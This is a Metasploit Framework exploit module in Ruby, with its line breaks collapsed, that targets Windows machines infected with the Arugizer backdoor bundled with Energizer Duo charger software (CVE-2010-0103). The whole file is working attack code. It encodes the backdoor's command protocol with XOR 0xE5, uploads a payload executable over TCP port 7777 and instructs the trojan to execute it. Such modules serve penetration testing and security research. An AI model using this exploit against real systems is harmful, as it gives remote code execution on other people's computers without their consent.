## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'Energizer DUO Trojan Code Execution', 'Description' => %q{ This module will execute an arbitrary payload against any system infected with the Arugizer trojan horse. This backdoor was shipped with the software package accompanying the Energizer Duo USB battery charger. }, 'Author' => [ 'hdm' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['CVE', '2010-0103'], ['OSVDB', '62782'], ['US-CERT-VU', '154421'] ], 'Platform' => 'win', 'Targets' => [ [ 'Automatic', { } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 05 2010' )) register_options( [ Opt::RPORT(7777), ], self.class) end def trojan_encode(str) str.unpack("C*").map{|c| c ^ 0xE5}.pack("C*") end def trojan_command(cmd) cid = "" case cmd when :exec cid = "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}" when :dir cid = "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}" when :write cid = "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}" when :read cid = "{F6C43E1A-1551-4000-A483-C361969AEC41}" when :nop cid = "{783EACBF-EF8B-498e-A059-F0B5BD12641E}" when :find cid = "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}" when :yes cid = "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}" when :runonce cid = "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}" when :delete cid = "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}" end trojan_encode( [cid.length + 1].pack("V") + cid + "\x00" ) end def exploit nam = "C:\\" + Rex::Text.rand_text_alphanumeric(12) + ".exe" + "\x00" exe = generate_payload_exe + "\x00" print_status("Trying to upload #{nam}...") connect # Write file request sock.put(trojan_command(:write)) sock.put(trojan_encode([nam.length].pack("V"))) sock.put(trojan_encode(nam)) sock.put(trojan_encode([exe.length].pack("V"))) sock.put(trojan_encode(exe)) # Required to prevent the server from spinning a loop sock.put(trojan_command(:nop)) disconnect # # Execute the payload # print_status("Trying to execute #{nam}...") connect # Execute file request sock.put(trojan_command(:exec)) sock.put(trojan_encode([nam.length].pack("V"))) sock.put(trojan_encode(nam)) # Required to prevent the server from spinning a loop sock.put(trojan_command(:nop)) disconnect end end